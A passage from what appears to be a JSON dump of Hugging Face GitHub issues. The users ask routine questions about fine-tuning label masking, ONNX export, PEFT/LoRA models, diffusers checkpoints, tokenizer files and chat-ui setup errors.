shouldn't that be called \"Fine Tuning\" the model (On a dialogue dataset of course) rather than \"Supervised Fine Tuning\". What am I missing? Is there a reference paper that explains this well? The right approach to do SFT for Dialogue applications?\r\n\r\nIt is not obvious hence the question. For example, the [InstructGPT](https://arxiv.org/abs/2203.02155) paper mentions SFT but mainly redirects to the (seemingly) first attempt at SFT in [this](https://arxiv.org/pdf/2109.10862.pdf) paper which talks about a \"Summarization\" task but not a \"Dialogue\" task.\r\n\r\nIn that paper, when human labelers are asked to summarize and then when the paper mentions \"Behavioral Cloning\" is used to finetune the LLM to adapt to this task, I'd imagine that only \"Summary\" section is considered label but not the entire prompt/document. 
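Concretely, "only the summary (or assistant) span counts as a label" is usually implemented by setting the labels of every other token to -100, the ignore_index of torch.nn.CrossEntropyLoss that transformers models use internally (trl also ships a DataCollatorForCompletionOnlyLM that packages this); a toy sketch, where the assistant mask is assumed to come from the chat template:

```python
# Sketch: compute the LM loss only on assistant tokens by masking labels.
import torch

IGNORE_INDEX = -100  # ignored by torch.nn.CrossEntropyLoss

def mask_non_assistant(input_ids: torch.Tensor, assistant_mask: torch.Tensor) -> torch.Tensor:
    """Clone input_ids into labels and blank out everything outside assistant turns."""
    labels = input_ids.clone()
    labels[~assistant_mask] = IGNORE_INDEX
    return labels

# toy example: 6 tokens, the last 3 belong to the assistant's reply
input_ids = torch.tensor([[11, 12, 13, 21, 22, 23]])
assistant_mask = torch.tensor([[False, False, False, True, True, True]])
print(mask_non_assistant(input_ids, assistant_mask))
# -> tensor([[-100, -100, -100,   21,   22,   23]])
```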
Following that principle, for \"Dialogue\" tasks, intuitively, I'd imagine that only \"assistant\" turns should be part of labels.\r\n\r\n(By the way I already asked [this](https://github.com/huggingface/trl/issues/1083) in trl repository as well but not sure which is the best repository to ask the question (this repository is for alignment tasks in which SFT is a step - hence posted here too).", "url": "https://github.com/huggingface/alignment-handbook/issues/74", "state": "open", "labels": [], "created_at": "2023-12-12T06:54:02Z", "updated_at": "2024-01-22T14:34:15Z", "comments": 3, "user": "PradeepKadubandi" }, { "repo": "huggingface/transformers.js", "number": 453, "title": "Summarization Parameters not working", "body": "### Question\n\nI've tried several of the supported summarization models with the code used in the browser extension example.\r\n\r\nThe only one I get any results from in a reasonable time is t5-small.\r\n\r\nMy problem with it is that despite any parameters I try to pass in the result is always same length.\r\n\r\nI've traced through the code and it appears that the config params get passed in.\r\n\r\nI've tried max_new_tokens, min_new_tokens, max_length, no joy.\r\n\r\nI initially started specifying 2.5.3 and last tried just letting cdn handle it, looks like 2.10.x, no joy, same thing.\r\n\r\nCould someone please provide me with an example of getting, in my case, the t5-small model running a summarization task that implements parameters as to output?", "url": "https://github.com/huggingface/transformers.js/issues/453", "state": "open", "labels": [ "question" ], "created_at": "2023-12-12T06:21:52Z", "updated_at": "2023-12-19T21:52:32Z", "user": "kwlayman" }, { "repo": "huggingface/safetensors", "number": 400, "title": "torch.nn.Module named_parameters() seem to be failing for safetensors ", "body": "### System Info\n\nsafetensors==0.4.1\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Reproduction\n\nNoticed this issue with the new Mixtral model\r\n\r\nhttps://github.com/vllm-project/vllm/issues/2020\r\n\r\nIs there any way to fix this with safetensors?\n\n### Expected behavior\n\nLoad the mixtral model in safe tensor format", "url": "https://github.com/huggingface/safetensors/issues/400", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-12-11T18:54:06Z", "updated_at": "2024-01-17T01:48:50Z", "comments": 1, "user": "0-hero" }, { "repo": "huggingface/optimum", "number": 1583, "title": "Add support for Chatglm2 & qwen onnx models", "body": "### Feature request\n\nNeed to export ChatGLM2 & Qwen models to onnx using hf optimum.\r\n\r\nChatGLM2: model-card-> [https://huggingface.co/THUDM/chatglm2-6b](https://github.com/huggingface/optimum/issues/url)\r\nQwen: model-card-> [https://huggingface.co/Qwen/Qwen-7B-Chat](https://github.com/huggingface/optimum/issues/url)\n\n### Motivation\n\nI would like to make the process of exporting llm models to onnx simpler. 
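For architectures that already have built-in ONNX configs, the generic path in optimum is close to a one-liner (a sketch; gpt2 is only a stand-in model id here, and ChatGLM2/Qwen are exactly the architectures this request would add):

```python
# Sketch: export-and-run for a supported architecture with optimum.
from optimum.onnxruntime import ORTModelForCausalLM
from transformers import AutoTokenizer

model_id = "gpt2"  # stand-in; chatglm2/qwen are not covered by built-in ONNX configs
model = ORTModelForCausalLM.from_pretrained(model_id, export=True)
tokenizer = AutoTokenizer.from_pretrained(model_id)

inputs = tokenizer("Hello, my name is", return_tensors="pt")
outputs = model.generate(**inputs, max_new_tokens=8)
print(tokenizer.batch_decode(outputs, skip_special_tokens=True))
```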
There should be generic boilerplate code which can export the models to ONNX by simply passing the Hugging Face model_id.\n\n### Your contribution\n\nI have this piece of code for the export: I'm using this code to export chatglm2: [https://gist.github.com/manishghop/9be5aee6ed3d7551c751cc5d9f7eb8c3](https://github.com/huggingface/optimum/issues/url)\r\nI use it for both chatglm2 & qwen by simply updating the model_id.\r\n\r\nIs there a way to run inference on these ONNX models?\r\n", "url": "https://github.com/huggingface/optimum/issues/1583", "state": "closed", "labels": [], "created_at": "2023-12-11T15:22:59Z", "updated_at": "2024-04-24T10:21:48Z", "comments": 4, "user": "manishghop" }, { "repo": "huggingface/peft", "number": 1247, "title": "How to save parameters in prompt_encoder layers in p-tuning?", "body": "I want to resume training from a checkpoint in p-tuning, but the model only saves parameters in prompt_embeddings.\r\n\"image\"\r\n\r\n", "url": "https://github.com/huggingface/peft/issues/1247", "state": "closed", "labels": [], "created_at": "2023-12-11T02:44:59Z", "updated_at": "2024-01-19T15:03:32Z", "user": "lyt719" }, { "repo": "huggingface/optimum-benchmark", "number": 102, "title": "How to evaluate a model that already exists locally and hasn't been uploaded yet, \"model=?\"", "body": "![微信截图_20231211144439](https://github.com/huggingface/optimum-benchmark/assets/89191003/51008a5a-ddf0-420e-a355-d9170ffb7dd6)\r\nI really want to know how to load the Qwen model, thank you very much", "url": "https://github.com/huggingface/optimum-benchmark/issues/102", "state": "closed", "labels": [], "created_at": "2023-12-10T08:35:59Z", "updated_at": "2024-01-11T08:18:17Z", "user": "WCSY-YG" }, { "repo": "huggingface/transformers", "number": 27928, "title": "[Question] What is the main difference between \"AutoModelForCasualLM\" and \"PeftModelForCausalLM\"?", "body": "I also posted this in the peft repo; however, this issue is also related to transformers, so I am writing my question here again.\r\nThe peft issue is here: https://github.com/huggingface/peft/issues/1245\r\n\r\nHello, sorry for the naive question.\r\nI noticed that the ``model.generate()`` function performs differently when inferring right after training with ```trainer.model``` versus after merge-and-unload. (All params are the same.)\r\nSo I checked the two different objects with a simple print.\r\nThe difference was the object that contains the model.\r\n\r\n1. 
```model = trainer.model```\r\n```\r\nPeftModelForCausalLM(\r\n (base_model): LoraModel(\r\n (model): LlamaForCausalLM(\r\n (model): LlamaModel(\r\n (embed_tokens): ModulesToSaveWrapper(\r\n (original_module): Embedding(32008, 5120)\r\n (modules_to_save): ModuleDict(\r\n (default): Embedding(32008, 5120)\r\n )\r\n )\r\n (layers): ModuleList(\r\n (0-39): 40 x LlamaDecoderLayer(\r\n (self_attn): LlamaAttention(\r\n (q_proj): Linear4bit(\r\n (lora_dropout): ModuleDict(\r\n (default): Dropout(p=0.1, inplace=False)\r\n )\r\n (lora_A): ModuleDict(\r\n (default): Linear(in_features=5120, out_features=64, bias=False)\r\n )\r\n (lora_B): ModuleDict(\r\n (default): Linear(in_features=64, out_features=5120, bias=False)\r\n )\r\n (lora_embedding_A): ParameterDict()\r\n (lora_embedding_B): ParameterDict()\r\n (base_layer): Linear4bit(in_features=5120, out_features=5120, bias=False)\r\n )\r\n (k_proj): Linear4bit(\r\n (lora_dropout): ModuleDict(\r\n (default): Dropout(p=0.1, inplace=False)\r\n )\r\n (lora_A): ModuleDict(\r\n (default): Linear(in_features=5120, out_features=64, bias=False)\r\n )\r\n (lora_B): ModuleDict(\r\n (default): Linear(in_features=64, out_features=5120, bias=False)\r\n )\r\n (lora_embedding_A): ParameterDict()\r\n (lora_embedding_B): ParameterDict()\r\n (base_layer): Linear4bit(in_features=5120, out_features=5120, bias=False)\r\n )\r\n (v_proj): Linear4bit(\r\n (lora_dropout): ModuleDict(\r\n (default): Dropout(p=0.1, inplace=False)\r\n )\r\n (lora_A): ModuleDict(\r\n (default): Linear(in_features=5120, out_features=64, bias=False)\r\n )\r\n (lora_B): ModuleDict(\r\n (default): Linear(in_features=64, out_features=5120, bias=False)\r\n )\r\n (lora_embedding_A): ParameterDict()\r\n (lora_embedding_B): ParameterDict()\r\n (base_layer): Linear4bit(in_features=5120, out_features=5120, bias=False)\r\n )\r\n (o_proj): Linear4bit(\r\n (lora_dropout): ModuleDict(\r\n (default): Dropout(p=0.1, inplace=False)\r\n )\r\n (lora_A): ModuleDict(\r\n (default): Linear(in_features=5120, out_features=64, bias=False)\r\n )\r\n (lora_B): ModuleDict(\r\n (default): Linear(in_features=64, out_features=5120, bias=False)\r\n )\r\n (lora_embedding_A): ParameterDict()\r\n (lora_embedding_B): ParameterDict()\r\n (base_layer): Linear4bit(in_features=5120, out_features=5120, bias=False)\r\n )\r\n (rotary_emb): LlamaRotaryEmbedding()\r\n )\r\n (mlp): LlamaMLP(\r\n (gate_proj): Linear4bit(\r\n (lora_dropout): ModuleDict(\r\n (default): Dropout(p=0.1, inplace=False)\r\n )\r\n (lora_A): ModuleDict(\r\n (default): Linear(in_features=5120, out_features=64, bias=False)\r\n )\r\n (lora_B): ModuleDict(\r\n (default): Linear(in_features=64, out_features=13824, bias=False)\r\n )\r\n (lora_embedding_A): ParameterDict()\r\n (lora_embedding_B): ParameterDict()\r\n (base_layer): Linear4bit(in_features=5120, out_features=13824, bias=False)\r\n )\r\n (up_proj): Linear4bit(\r\n (lora_dropout): ModuleDict(\r\n (default): Dropout(p=0.1, inplace=False)\r\n )\r\n (lora_A): ModuleDict(\r\n (default): Linear(in_features=5120, out_features=64, bias=False)\r\n )\r\n (lora_B): ModuleDict(\r\n (default): Linear(in_features=64, out_features=13824, bias=False)\r\n )\r\n (lora_embedding_A): ParameterDict()\r\n (lora_embedding_B): ParameterDict()\r\n (base_layer): Linear4bit(i", "url": "https://github.com/huggingface/transformers/issues/27928", "state": "closed", "labels": [], "created_at": "2023-12-10T03:10:36Z", "updated_at": "2024-02-01T00:49:07Z", "user": "daehuikim" }, { "repo": "huggingface/peft", "number": 1245, "title": "[Question] 
What is the main difference between \"AutoModelForCasualLM\" and \"PeftModelForCausalLM\"?", "body": "Because This is is related to \"transformers\". Therefore I wrote this question in transformers repo either.\r\nissue is here in transformers(https://github.com/huggingface/transformers/issues/27928)\r\n\r\nHello, Sorry for naive question.\r\nI noticed that the``model.generate()`` function performed differently when inferrence right after train with ```trainer.model``` and after merge and unload. (Every params are the same.)\r\nSo I checked two different object with simple print function.\r\nDifference was the object that contains model.\r\n\r\n1. ```model = trainer.model```\r\n```\r\nPeftModelForCausalLM(\r\n (base_model): LoraModel(\r\n (model): LlamaForCausalLM(\r\n (model): LlamaModel(\r\n (embed_tokens): ModulesToSaveWrapper(\r\n (original_module): Embedding(32008, 5120)\r\n (modules_to_save): ModuleDict(\r\n (default): Embedding(32008, 5120)\r\n )\r\n )\r\n (layers): ModuleList(\r\n (0-39): 40 x LlamaDecoderLayer(\r\n (self_attn): LlamaAttention(\r\n (q_proj): Linear4bit(\r\n (lora_dropout): ModuleDict(\r\n (default): Dropout(p=0.1, inplace=False)\r\n )\r\n (lora_A): ModuleDict(\r\n (default): Linear(in_features=5120, out_features=64, bias=False)\r\n )\r\n (lora_B): ModuleDict(\r\n (default): Linear(in_features=64, out_features=5120, bias=False)\r\n )\r\n (lora_embedding_A): ParameterDict()\r\n (lora_embedding_B): ParameterDict()\r\n (base_layer): Linear4bit(in_features=5120, out_features=5120, bias=False)\r\n )\r\n (k_proj): Linear4bit(\r\n (lora_dropout): ModuleDict(\r\n (default): Dropout(p=0.1, inplace=False)\r\n )\r\n (lora_A): ModuleDict(\r\n (default): Linear(in_features=5120, out_features=64, bias=False)\r\n )\r\n (lora_B): ModuleDict(\r\n (default): Linear(in_features=64, out_features=5120, bias=False)\r\n )\r\n (lora_embedding_A): ParameterDict()\r\n (lora_embedding_B): ParameterDict()\r\n (base_layer): Linear4bit(in_features=5120, out_features=5120, bias=False)\r\n )\r\n (v_proj): Linear4bit(\r\n (lora_dropout): ModuleDict(\r\n (default): Dropout(p=0.1, inplace=False)\r\n )\r\n (lora_A): ModuleDict(\r\n (default): Linear(in_features=5120, out_features=64, bias=False)\r\n )\r\n (lora_B): ModuleDict(\r\n (default): Linear(in_features=64, out_features=5120, bias=False)\r\n )\r\n (lora_embedding_A): ParameterDict()\r\n (lora_embedding_B): ParameterDict()\r\n (base_layer): Linear4bit(in_features=5120, out_features=5120, bias=False)\r\n )\r\n (o_proj): Linear4bit(\r\n (lora_dropout): ModuleDict(\r\n (default): Dropout(p=0.1, inplace=False)\r\n )\r\n (lora_A): ModuleDict(\r\n (default): Linear(in_features=5120, out_features=64, bias=False)\r\n )\r\n (lora_B): ModuleDict(\r\n (default): Linear(in_features=64, out_features=5120, bias=False)\r\n )\r\n (lora_embedding_A): ParameterDict()\r\n (lora_embedding_B): ParameterDict()\r\n (base_layer): Linear4bit(in_features=5120, out_features=5120, bias=False)\r\n )\r\n (rotary_emb): LlamaRotaryEmbedding()\r\n )\r\n (mlp): LlamaMLP(\r\n (gate_proj): Linear4bit(\r\n (lora_dropout): ModuleDict(\r\n (default): Dropout(p=0.1, inplace=False)\r\n )\r\n (lora_A): ModuleDict(\r\n (default): Linear(in_features=5120, out_features=64, bias=False)\r\n )\r\n (lora_B): ModuleDict(\r\n (default): Linear(in_features=64, out_features=13824, bias=False)\r\n )\r\n (lora_embedding_A): ParameterDict()\r\n (lora_embedding_B): ParameterDict()\r\n (base_layer): Linear4bit(in_features=5120, out_features=13824, bias=False)\r\n )\r\n (up_proj): Linear4bit(\r\n 
(lora_dropout): ModuleDict(\r\n (default): Dropout(p=0.1, inplace=False)\r\n )\r\n (lora_A): ModuleDict(\r\n (default): Linear(in_features=5120, out_features=64, bias=False)\r\n )\r\n (lora_B): ModuleDict(\r\n (default): Linear(in_features=64, out_features=13824, bias=False)\r\n )\r\n (lora_embedding_A): ParameterDict()\r\n (lora_embedding_B): ParameterDict()\r\n (base_layer): Linear4bit", "url": "https://github.com/huggingface/peft/issues/1245", "state": "closed", "labels": [], "created_at": "2023-12-10T03:08:54Z", "updated_at": "2023-12-11T11:15:25Z", "user": "daehuikim" }, { "repo": "huggingface/diffusers", "number": 6113, "title": "How to use the models from sd_control_collection hf repo in diffusers", "body": "How to load/convert the models at https://huggingface.co/lllyasviel/sd_control_collection/tree/main with diffusers?\r\n\r\n```\r\n>>> pipe = diffusers.StableDiffusionPipeline.from_single_file(\"diffusers_xl_canny_full.safetensors\")\r\nTraceback (most recent call last):\r\n File \"\", line 1, in \r\n File \"/home/ubuntu/.local/lib/python3.10/site-packages/diffusers/loaders/single_file.py\", line 261, in from_single_file\r\n pipe = download_from_original_stable_diffusion_ckpt(\r\n File \"/home/ubuntu/.local/lib/python3.10/site-packages/diffusers/pipelines/stable_diffusion/convert_from_ckpt.py\", line 1436, in download_from_original_stable_diffusion_ckpt\r\n converted_unet_checkpoint = convert_ldm_unet_checkpoint(\r\n File \"/home/ubuntu/.local/lib/python3.10/site-packages/diffusers/pipelines/stable_diffusion/convert_from_ckpt.py\", line 426, in convert_ldm_unet_checkpoint\r\n new_checkpoint[\"time_embedding.linear_1.weight\"] = unet_state_dict[\"time_embed.0.weight\"]\r\nKeyError: 'time_embed.0.weight'\r\n```\r\nAlso not able to convert it via hf script: https://github.com/huggingface/diffusers/blob/main/scripts/convert_original_controlnet_to_diffusers.py\r\n\r\nWe are able to run it through https://github.com/AUTOMATIC1111 webui. 
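One plausible route (an assumption about newer diffusers releases, where ControlNetModel gained from_single_file; the KeyError above comes from loading a ControlNet-only checkpoint through StableDiffusionPipeline.from_single_file, which expects a full SD checkpoint):

```python
# Hedged sketch: load the ControlNet checkpoint directly, then attach it to an
# SDXL pipeline (requires a diffusers version with ControlNetModel.from_single_file).
import torch
from diffusers import ControlNetModel, StableDiffusionXLControlNetPipeline

controlnet = ControlNetModel.from_single_file(
    "diffusers_xl_canny_full.safetensors", torch_dtype=torch.float16
)
pipe = StableDiffusionXLControlNetPipeline.from_pretrained(
    "stabilityai/stable-diffusion-xl-base-1.0",
    controlnet=controlnet,
    torch_dtype=torch.float16,
)
```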
How can it be used with diffusers?", "url": "https://github.com/huggingface/diffusers/issues/6113", "state": "closed", "labels": [], "created_at": "2023-12-09T14:11:26Z", "updated_at": "2024-06-11T18:22:03Z", "user": "anilsathyan7" }, { "repo": "huggingface/tokenizers", "number": 1410, "title": "How to create Tokenizer.json?", "body": "I have this tokenizer and I want to convert it to **tokenizer.json** format.\r\n\r\n- added_tokens.json \r\n- normalizer.json \r\n- special_tokens_map.json\r\n- config.json \r\n- preprocessor_config.json \r\n- vocab.json\r\n- merges.txt \r\n- pytorch_model.bin\r\n\r\nIs it possible to replace my tokenizer data with the original **tokenizer.json**?\r\n\r\n```\r\nimport json\r\n\r\nj = open('hf/tokenizer.json')\r\ndata = json.load(j)\r\n\r\nwith open('medium-tokenizer/merges.txt') as f:\r\n merges = f.readlines()\r\nmerges.pop(0)\r\n\r\nj = open('medium-tokenizer/vocab.json')\r\nvocab = json.load(j)\r\nj = open('medium-tokenizer/added_tokens.json')\r\nadded_tokens = json.load(j)\r\nj = open('medium-tokenizer/normalizer.json')\r\nnormalizer = json.load(j)\r\n\r\ndata['added_tokens'] = added_tokens\r\ndata['normalizer'] = normalizer\r\ndata['model']['vocab'] = vocab\r\ndata['model']['merges'] = merges\r\n\r\nwith open(\"tokenizer.json\", \"w\") as outfile:\r\n json.dump(data, outfile)\r\n```", "url": "https://github.com/huggingface/tokenizers/issues/1410", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-12-08T09:41:18Z", "updated_at": "2024-01-14T01:52:39Z", "user": "kenaii" }, { "repo": "huggingface/optimum", "number": 1577, "title": "Support the ORT of the Stable Diffusion XL inpaint model", "body": "### Feature request\r\n\r\nHi all.\r\n\r\nWe would like to convert the stable-diffusion-xl-inpaint model below to ONNX and run it using ORT. The conversion to ONNX went well using Optimum's cli, but there doesn't seem to be a Python class for ORT inference.\r\n\r\nhttps://huggingface.co/diffusers/stable-diffusion-xl-1.0-inpainting-0.1\r\n\r\nIs there a way to perform inference on this model with the optimum package? If not, do you have any plans to provide support?\r\n\r\nThank you\r\n\r\n### Motivation\r\n\r\nTo run sd-xl inpaint model with ORT\r\n\r\n### Your contribution\r\n\r\nI can submit a PR for you if I have something to help", "url": "https://github.com/huggingface/optimum/issues/1577", "state": "closed", "labels": [ "feature-request", "Stale" ], "created_at": "2023-12-08T09:21:06Z", "updated_at": "2025-02-19T02:02:54Z", "comments": 2, "user": "0-chan-kor" }, { "repo": "huggingface/chat-ui", "number": 617, "title": "Does Chat-UI support multithreading?", "body": "Maybe it depends on node.js, but I want to know the CPU utilization.", "url": "https://github.com/huggingface/chat-ui/issues/617", "state": "closed", "labels": [ "question" ], "created_at": "2023-12-08T05:36:18Z", "updated_at": "2023-12-14T07:30:01Z", "user": "calycekr" }, { "repo": "huggingface/chat-ui", "number": 615, "title": "npm run error (latest git pull)", "body": "I created a .env.local as:\r\n```\r\nMONGODB_URL=mongodb://localhost:27017\r\nMONGODB_DB_NAME=chat-ui\r\nMONGODB_DIRECT_CONNECTION=false\r\n\r\nCOOKIE_NAME=hf-chat\r\nHF_TOKEN=\r\nHF_API_ROOT=https://api-inference.huggingface.co/models\r\nOPENAI_API_KEY=\r\n\r\n```\r\nThen I tried:\r\n```\r\nnpm install #everything went fine\r\nnpm run dev -- --host 0.0.0.0\r\n```\r\n\r\nbut I got the error below:\r\n```\r\n(node:770942) [DEP0040] DeprecationWarning: The `punycode` module is deprecated. 
Please use a userland alternative instead.\r\n(Use `node --trace-deprecation ...` to show where the warning was created)\r\n11:47:42 AM [vite] Error when evaluating SSR module /src/lib/server/auth.ts:\r\n|- SyntaxError: \"undefined\" is not valid JSON\r\n at JSON.parse ()\r\n at /home/shuther/devProjects/chat-ui/src/lib/server/auth.ts:43:14\r\n at async instantiateModule (file:///home/shuther/devProjects/chat-ui/node_modules/vite/dist/node/chunks/dep-e8f070e8.js:54405:9)\r\n\r\n11:47:42 AM [vite] Error when evaluating SSR module /src/hooks.server.ts: failed to import \"/src/lib/server/auth.ts\"\r\n|- SyntaxError: \"undefined\" is not valid JSON\r\n at JSON.parse ()\r\n at /home/shuther/devProjects/chat-ui/src/lib/server/auth.ts:43:14\r\n at async instantiateModule (file:///home/shuther/devProjects/chat-ui/node_modules/vite/dist/node/chunks/dep-e8f070e8.js:54405:9)\r\n\r\nSyntaxError: \"undefined\" is not valid JSON\r\n at JSON.parse ()\r\n at /home/shuther/devProjects/chat-ui/src/lib/server/auth.ts:43:14\r\n at async instantiateModule (file:///home/shuther/devProjects/chat-ui/node_modules/vite/dist/node/chunks/dep-e8f070e8.js:54405:9)\r\nSyntaxError: \"undefined\" is not valid JSON\r\n at JSON.parse ()\r\n at /home/shuther/devProjects/chat-ui/src/lib/server/auth.ts:43:14\r\n at async instantiateModule (file:///home/shuther/devProjects/chat-ui/node_modules/vite/dist/node/chunks/dep-e8f070e8.js:54405:9)\r\n\r\n```\r\n\r\nOn the browser side, I have error 500 (nice picture)", "url": "https://github.com/huggingface/chat-ui/issues/615", "state": "closed", "labels": [ "support" ], "created_at": "2023-12-07T10:59:53Z", "updated_at": "2024-04-24T12:29:46Z", "comments": 4, "user": "shuther" }, { "repo": "huggingface/chat-ui", "number": 614, "title": "Docker build - multiple errors - documentation", "body": "I can't find documentation to build it myself; so I tried:\r\n`docker-compose build up`\r\nBut I got multiple errors amoung:\r\n\r\n> chat-ui/.env: line 23: unexpected character \"\\\"\" in variable name \"\\\"PROVIDER_URL\\\": \\\"\\\",\"\r\n\r\nEven `source .env` returned multiple errors; I tried to change the `into a ' with no luck.\r\n\r\nMy goal was to build it and include it into a docker compose.", "url": "https://github.com/huggingface/chat-ui/issues/614", "state": "open", "labels": [ "support" ], "created_at": "2023-12-07T10:55:04Z", "updated_at": "2024-06-01T12:44:18Z", "comments": 4, "user": "shuther" }, { "repo": "huggingface/text-generation-inference", "number": 1318, "title": "how to run tgi installed locally without any UI", "body": "### System Info\n\nhow to run tgi installed locally without any UI?\r\n pip install text-generation , giving error: ERROR: No matching distribution found for text-generation\n\n### Information\n\n- [ ] Docker\n- [X] The CLI directly\n\n### Tasks\n\n- [X] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\n pip install text-generation\n\n### Expected behavior\n\nneed some help running tgi+my model on cmdline", "url": "https://github.com/huggingface/text-generation-inference/issues/1318", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-12-07T08:47:13Z", "updated_at": "2024-01-13T01:46:40Z", "user": "poojitharamachandra" }, { "repo": "huggingface/autotrain-advanced", "number": 376, "title": "How to a Autotrain Seq2Seq ? 
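> Note on huggingface/tokenizers#1410 above: splicing `vocab.json` and `merges.txt` into an existing `tokenizer.json` can work, but the snippet's `readlines()` keeps the trailing newline on every merge rule, and `added_tokens.json` (a token-to-id map) does not match the list-of-records shape `tokenizer.json` expects. A hedged rework of the same script, paths as in the original:

```python
import json

with open("medium-tokenizer/merges.txt") as f:
    merges = [line.rstrip("\n") for line in f][1:]  # drop "#version" header, strip newlines

with open("hf/tokenizer.json") as f:
    data = json.load(f)
with open("medium-tokenizer/vocab.json") as f:
    data["model"]["vocab"] = json.load(f)
data["model"]["merges"] = merges

# added_tokens.json maps token -> id, but tokenizer.json stores a list of records.
with open("medium-tokenizer/added_tokens.json") as f:
    data["added_tokens"] = [
        {"id": i, "content": tok, "single_word": False, "lstrip": False,
         "rstrip": False, "normalized": False, "special": True}
        for tok, i in json.load(f).items()
    ]

with open("tokenizer.json", "w") as f:
    json.dump(data, f, ensure_ascii=False)
```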
", "body": "Hi everyone , I'm trying to finetune a Helsinki-NLP/opus-mt-tc-big-ar-en on local arabic of morocco which is called Daraija Arabic , the problem is that I'm unable to use Autotrain I keep getting 500 error code \r\n![Screenshot 2023-12-07 011848](https://github.com/huggingface/autotrain-advanced/assets/112639221/ece3ee15-9f89-44ff-bf51-c5231f1858e7)\r\n![Screenshot 2023-12-07 011912](https://github.com/huggingface/autotrain-advanced/assets/112639221/2dea03ae-afcd-4e86-a7b3-d175ff6bc555)\r\n[output.csv](https://github.com/huggingface/autotrain-advanced/files/13593069/output.csv)\r\nFYI : I didnt modify Training Parameters (find params to copy-paste [here] area so I dont know if its necessary ", "url": "https://github.com/huggingface/autotrain-advanced/issues/376", "state": "closed", "labels": [], "created_at": "2023-12-07T00:22:46Z", "updated_at": "2023-12-08T17:27:57Z", "user": "Lachkar-Ahmed-Salim" }, { "repo": "huggingface/autotrain-advanced", "number": 375, "title": "How to do a Seq2Seq Autotrain ?", "body": "", "url": "https://github.com/huggingface/autotrain-advanced/issues/375", "state": "closed", "labels": [], "created_at": "2023-12-07T00:10:33Z", "updated_at": "2023-12-11T09:41:24Z", "user": "Lachkar-Ahmed-Salim" }, { "repo": "huggingface/alignment-handbook", "number": 68, "title": "DPO alignment doesn't work on Lora models as suggested ", "body": "You claim that \"[In practice, we find comparable performance for both full and LoRA fine-tuning, with the latter having the advantage of producing small adapter weights that are fast to upload and download from the Hugging Face Hub.](https://github.com/huggingface/alignment-handbook/tree/main/scripts#:~:text=In%20practice%2C%20we%20find%20comparable%20performance%20for%20both%20full%20and%20LoRA%20fine%2Dtuning%2C%20with%20the%20latter%20having%20the%20advantage%20of%20producing%20small%20adapter%20weights%20that%20are%20fast%20to%20upload%20and%20download%20from%20the%20Hugging%20Face%20Hub.)\"\r\n\r\nHowever, when I try the Lora model DPO-aligned LLM that you have trained, [alignment-handbook/zephyr-7b-dpo-lora](https://huggingface.co/alignment-handbook/zephyr-7b-dpo-lora), I experience a total performance degradation. \r\nHere is an example of model output that seems confused:\r\n![image](https://github.com/huggingface/alignment-handbook/assets/3280518/1c5eae99-9641-469a-bb73-b66a26a594d4)\r\n\r\nEven the training loss indicates that the model has not learned much\r\n\"image\"\r\n\r\nHere is the training loss for the full model DPO alignment. \r\n![image](https://github.com/huggingface/alignment-handbook/assets/3280518/902aaf32-0446-4ab1-8e38-28afcd456fed)\r\n \r\nWould you please do a clarification? 
Is my observation different from what you have experienced?\r\n\r\nThanks\r\n", "url": "https://github.com/huggingface/alignment-handbook/issues/68", "state": "open", "labels": [], "created_at": "2023-12-06T19:12:30Z", "updated_at": "2023-12-07T09:43:32Z", "comments": 1, "user": "Abe13" }, { "repo": "huggingface/alignment-handbook", "number": 66, "title": "How to specify another GPU to run rather than cuda:0?", "body": "I tried to modify the --gpu_ids paramater in recipes/accelerate_configs/multi_gpu.yaml, however, it didn't work, the device was still 'cuda:0'.", "url": "https://github.com/huggingface/alignment-handbook/issues/66", "state": "closed", "labels": [], "created_at": "2023-12-06T10:48:25Z", "updated_at": "2023-12-06T11:13:02Z", "user": "njupopsicle" }, { "repo": "huggingface/datasets", "number": 6478, "title": "How to load data from lakefs", "body": "My dataset is stored on the company's lakefs server. How can I write code to load the dataset? It would be great if I could provide code examples or provide some references\r\n", "url": "https://github.com/huggingface/datasets/issues/6478", "state": "closed", "labels": [], "created_at": "2023-12-06T09:04:11Z", "updated_at": "2024-07-03T19:13:57Z", "user": "d710055071" }, { "repo": "huggingface/tokenizers", "number": 1407, "title": "How to add byte_fallback tokens?", "body": "# Alternative title\r\n\r\nHow to make a tokenizer behaving similarly to Llama\r\n\r\n## Background \r\n\r\nLlama tokenizer considers byte_fallback tokens **not special**. When it decodes, it doesn't remove these tokens other than special tokens (unk, pad, bos, eos).\r\n\r\n## What I am trying to do\r\n\r\nI'm trying to create a tokenizer behaving like Llama. However, I **am only able** to add byte_fallback tokens as **special tokens**.\r\n\r\n```python\r\nfrom tokenizers import Tokenizer\r\nfrom tokenizers import decoders, pre_tokenizers\r\nfrom tokenizers.models import BPE\r\nfrom tokenizers.processors import TemplateProcessing\r\nfrom tokenizers.trainers import BpeTrainer\r\nfrom tokenizers import AddedToken\r\n\r\nfrom datasets import load_dataset\r\n\r\ndataset = load_dataset(\"tapaco\")\r\n\r\ndef topaco_generator():\r\n for i in dataset['train']:\r\n yield i['paraphrase']\r\n\r\nbpe_trainer = BpeTrainer(\r\n special_tokens=[\"\", \"\", \"\", \"\"]\r\n + [f\"<0x{i:02X}>\" for i in range(256)] # byte_fallback tokens\r\n)\r\n\r\ntokenizer = Tokenizer(BPE(byte_fallback=True))\r\ntokenizer.pre_tokenizer = pre_tokenizers.Sequence(\r\n [pre_tokenizers.Metaspace(), pre_tokenizers.Digits(individual_digits=True)]\r\n)\r\ntokenizer.enable_padding(pad_id=3, pad_token=\"\")\r\ntokenizer.post_processor = TemplateProcessing(\r\n single=\" $A \",\r\n pair=\" $A $B \",\r\n special_tokens=[\r\n (\"\", 1),\r\n (\"\", 2),\r\n ],\r\n)\r\ntokenizer.decoder = decoders.Sequence(\r\n [\r\n decoders.Metaspace(),\r\n decoders.ByteFallback(),\r\n ]\r\n)\r\n# my attempt to add byte_fallback as non-special tokens\r\n# tokenizer.add_tokens([AddedToken(content=f\"<0x{i:02X}>\", special=True, normalized=False) for i in range(256)])\r\n\r\ntokenizer.train_from_iterator(topaco_generator(), trainer=bpe_trainer)\r\ntokenizer.save(\"topaco_tokenizer.json\")\r\n\r\ntokenizer = Tokenizer.from_file(\"topaco_tokenizer.json\")\r\n\r\ntext = \"I love you more than I can say \ud83e\udd17\"\r\nencoded_text = 